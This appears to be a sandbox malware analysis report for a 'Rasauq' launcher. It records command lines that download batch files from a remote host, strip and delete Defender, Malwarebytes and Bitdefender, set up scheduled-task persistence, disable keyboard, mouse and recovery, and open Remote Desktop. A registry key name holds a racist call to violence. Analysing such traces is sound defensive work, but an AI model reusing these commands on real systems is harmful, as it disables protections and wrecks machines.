| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\system32\reg.exe | N/A |
| Key created | \Registry\User\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
C:\Windows\system32\curl.exe
curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\system32\curl.exe
curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
C:\Windows\system32\openfiles.exe
openfiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(new-object -com shell.application).minimizeall()"
C:\Windows\system32\curl.exe
curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
C:\Windows\system32\ReAgentc.exe
reagentc /disable
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue {default} recoveryenabled
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableAntiTamper $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbam.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MBAMService.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamtray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamscheduler.exe /T
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\sc.exe
sc stop MBAMProtector
C:\Windows\system32\sc.exe
sc delete MBAMProtector
C:\Windows\system32\sc.exe
sc stop MBAMChameleon
C:\Windows\system32\sc.exe
sc delete MBAMChameleon
C:\Windows\system32\sc.exe
sc stop MBAMFarflt
C:\Windows\system32\sc.exe
sc delete MBAMFarflt
C:\Windows\system32\sc.exe
sc stop MBAMSwissArmy
C:\Windows\system32\sc.exe
sc delete MBAMSwissArmy
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdservicehost.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdagent.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdredline.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdparentalservice.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdreinit.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdsubwiz.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM seccenter.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM vsserv.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM epssecurityservice.exe /T
C:\Windows\system32\sc.exe
sc stop bdservicehost
C:\Windows\system32\sc.exe
sc delete bdservicehost
C:\Windows\system32\sc.exe
sc stop bdagent
C:\Windows\system32\sc.exe
sc delete bdagent
C:\Windows\system32\sc.exe
sc stop bdredline
C:\Windows\system32\sc.exe
sc delete bdredline
C:\Windows\system32\sc.exe
sc stop bdparentalservice
C:\Windows\system32\sc.exe
sc delete bdparentalservice
C:\Windows\system32\sc.exe
sc stop bdreinit
C:\Windows\system32\sc.exe
sc delete bdreinit
C:\Windows\system32\sc.exe
sc stop bdsubwiz
C:\Windows\system32\sc.exe
sc delete bdsubwiz
C:\Windows\system32\sc.exe
sc stop seccenter
C:\Windows\system32\sc.exe
sc delete seccenter
C:\Windows\system32\sc.exe
sc stop vsserv
C:\Windows\system32\sc.exe
sc delete vsserv
C:\Windows\system32\sc.exe
sc stop epssecurityservice
C:\Windows\system32\sc.exe
sc delete epssecurityservice
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\taskkill.exe
taskkill /F /IM MsMpEng.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MpCmdRun.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM SecurityHealthSystray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM smartscreen.exe /T
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\notepad.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\calc.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
